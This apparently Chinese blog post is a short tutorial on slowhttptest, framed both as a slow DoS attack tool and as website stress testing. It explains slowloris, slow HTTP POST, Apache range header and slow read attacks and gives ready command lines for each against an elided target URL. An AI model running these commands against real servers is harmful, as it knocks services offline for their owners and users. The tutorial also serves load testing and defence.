慢速DoS攻击工具slowhttptest(网站压力测试工具)

27 篇文章 0 订阅
12 篇文章 0 订阅

慢速DoS攻击工具slowhttptest(网站压力测试工具)

slowhttptest

低带宽的应用层的慢速DoS工具,即通过与目标服务器保持长期的连接,从而将目标服务器的资源耗尽,达到DoS攻击的目的

安装方法

kali中直接安装即可:sudo apt-get install slowhttptest

使用方法

安装完成后,可以先使用slowhttptest -h 命令查看一下参数的解释和使用
如:slowhttptest -c 5000 -u http://...
-c:target number of connections
-u:absolute URL of target(注意:表示目标地址,需要加上http://协议标准)

四种攻击模式

  1. slowloris
  2. show HTTP POST
  3. Apache range header
  4. slow read
1. slowloris(默认为slowloris模式)

攻击原理:正常完整的http请求是以\r\n\r\n结尾的,但是slowloris只发送\r\n,导致目标服务器认为请求还未发送完成,一直等待直到超时

slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://... -x 24 -p 3
2. slow HTTP POST

攻击原理:和slowloris类似,都是利用了http请求头,不过slow http post是利用了Content-Length这个参数,声明一个很大的Content-Length,导致body部分发送缓慢,服务器便会一直等待

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://... -x 10 -p 3
3. Apache range header

攻击原理:攻击者向目标服务器传输一个很大的文件,体积超过Body大小限制进行分段,从而耗尽服务器的CPU和内存资源

slowhttptest -R -u http://... -t HEAD -c 1000 -a 10 -b 3000 -r 500
4. slow read attack

攻击原理:向目标服务器发送一个请求,请求一个很大的文件,但是慢速读取响应数据,使得文件长期滞留于目标服务器中,耗尽资源,通过调整TCP窗口大小(很小),使目标服务器慢速返回数据

slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://... -p 3

Tip:以上命令中,详细的参数信息可以利用-h命令进行查看

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值